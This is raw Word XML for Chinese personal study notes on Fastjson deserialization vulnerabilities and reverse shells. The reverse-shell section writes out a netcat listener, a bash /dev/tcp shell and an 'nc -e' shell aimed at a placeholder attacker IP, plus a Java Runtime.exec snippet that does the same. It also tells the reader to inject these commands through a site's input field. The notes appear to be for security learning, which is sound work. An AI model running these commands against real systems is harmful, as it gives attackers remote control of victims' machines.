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59C53" w14:textId="737027E1" w:rsidR="00B257B4" w:rsidRDefault="00C41C1E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ast</w:t>
      </w:r>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 反序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F057925" w14:textId="45A943FB" w:rsidR="00C41C1E" w:rsidRDefault="006618F6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;1.2.80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53623A95" w14:textId="7212410F" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E5FCC8" w14:textId="607AFB82" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>astjson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把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转为对象 把对象转为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14474678" w14:textId="36285746" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4C6ACC" w14:textId="148BAC1F" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:t>SON.toJSONString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(obj)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E988C7" w14:textId="1147E463" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499F7C37" w14:textId="7D69B2E0" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>.parseObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>str,class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6F4EF6" w14:textId="77777777" w:rsidR="006618F6" w:rsidRDefault="006618F6"/>
    <w:p w14:paraId="3D78D746" w14:textId="55F49DE4" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558EEF82" w14:textId="05655CBC" w:rsidR="006248E9" w:rsidRPr="009D38B4" w:rsidRDefault="006248E9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D38B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>为什么要反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9EE81D" w14:textId="6A79355D" w:rsidR="006248E9" w:rsidRDefault="006248E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户是在局域网里 不好直接连接</w:t>
      </w:r>
      <w:r w:rsidR="009D38B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就让用户主动连接攻击者 连接上之后 就可以给他发请求了 例如</w:t>
      </w:r>
      <w:r w:rsidR="009D38B4">
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidR="009D38B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>什么的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EF7749" w14:textId="5851BC6F" w:rsidR="009D38B4" w:rsidRPr="009D38B4" w:rsidRDefault="009D38B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D38B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>怎么反弹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE95F44" w14:textId="2DED926A" w:rsidR="009D38B4" w:rsidRDefault="009D38B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者打开端口等待连接：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="98C379"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBC9FEE" w14:textId="21608D67" w:rsidR="006618F6" w:rsidRDefault="009D38B4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="98C379"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被攻击者运行反弹命令（被攻击者怎么运行 其实就是在该服务器网站上找个输入的入口 写入命令就好了）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t xml:space="preserve">bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro" w:hint="eastAsia"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro" w:hint="eastAsia"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="98C379"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="98C379"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="98C379"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F159F5" w14:textId="049575BE" w:rsidR="009D38B4" w:rsidRPr="009D38B4" w:rsidRDefault="009D38B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D38B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D38B4">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D38B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D38B4">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D38B4">
        <w:t xml:space="preserve"> -e /bin/bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者IP</w:t>
      </w:r>
      <w:r w:rsidRPr="009D38B4">
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
      <w:r w:rsidRPr="009D38B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可以telnet反弹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24555316" w14:textId="6665E4D6" w:rsidR="009D38B4" w:rsidRDefault="009D38B4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="98C379"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro" w:hint="eastAsia"/>
          <w:color w:val="98C379"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然后被攻击者就与攻击者连上了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638A67B1" w14:textId="294DFFA7" w:rsidR="009D38B4" w:rsidRDefault="009D38B4">
      <w:r w:rsidRPr="009D38B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者就可以在自己的电脑上执行命令查看对方电脑的信息了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF0D66D" w14:textId="540F2027" w:rsidR="009D38B4" w:rsidRDefault="009D38B4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java反弹就是使用Runtime去执行上面的命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACD3325" w14:textId="77777777" w:rsidR="009D38B4" w:rsidRDefault="009D38B4" w:rsidP="009D38B4">
      <w:r>
        <w:t xml:space="preserve">Runtime r = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Runtime.getRuntime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0D2FEA69" w14:textId="1BE24E46" w:rsidR="009D38B4" w:rsidRDefault="009D38B4" w:rsidP="009D38B4">
      <w:r>
        <w:t xml:space="preserve">String </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[]= {"/bin/bash","-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>c","exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 5&lt;&gt;/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>/4444;cat &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&amp;5; done"};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02407B11" w14:textId="5B23363D" w:rsidR="009D38B4" w:rsidRDefault="009D38B4" w:rsidP="009D38B4">
      <w:r>
        <w:t xml:space="preserve">Process p = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>r.exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBDE223" w14:textId="70E4B074" w:rsidR="009D38B4" w:rsidRDefault="009D38B4" w:rsidP="009D38B4">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>p.waitFor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BDBA22" w14:textId="77777777" w:rsidR="006618F6" w:rsidRDefault="006618F6"/>
    <w:p w14:paraId="3D95F51A" w14:textId="77777777" w:rsidR="009D38B4" w:rsidRDefault="009D38B4"/>
    <w:p w14:paraId="0396AF64" w14:textId="77777777" w:rsidR="009D38B4" w:rsidRDefault="009D38B4"/>
    <w:p w14:paraId="309CF72F" w14:textId="77777777" w:rsidR="009D38B4" w:rsidRDefault="009D38B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8F4331" w14:textId="0B5E6B71" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4446C28E" w14:textId="119E8E24" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fastjson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在解析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的过程中 使用@type字段来指定反序列化的类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791F1228" w14:textId="559C9E0B" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在处理对象的时候 没有对@type字段进行安全校验 攻击者就可以传入危险类 并调用危险类连接远程RMI主机 然后执行恶意代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5316BB53" w14:textId="77777777" w:rsidR="006618F6" w:rsidRDefault="006618F6"/>
    <w:p w14:paraId="3BA98C6F" w14:textId="5FD04B04" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64783E9B" w14:textId="0EB439F2" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.2.24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6175C661" w14:textId="77777777" w:rsidR="006618F6" w:rsidRDefault="006618F6"/>
    <w:p w14:paraId="373E7F3B" w14:textId="77777777" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00661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58"/>
    <w:rsid w:val="004B6158"/>
    <w:rsid w:val="005A1CB5"/>
    <w:rsid w:val="006248E9"/>
    <w:rsid w:val="006618F6"/>
    <w:rsid w:val="008B738E"/>
    <w:rsid w:val="009D38B4"/>
    <w:rsid w:val="00B257B4"/>
    <w:rsid w:val="00C41C1E"/>
    <w:rsid w:val="00F7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FDCAE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BF6EE5E5-8B81-0444-9DC0-69F8C6DB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618F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618F6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009D3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2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yuan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>geng yuan</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-08T13:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-09T11:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>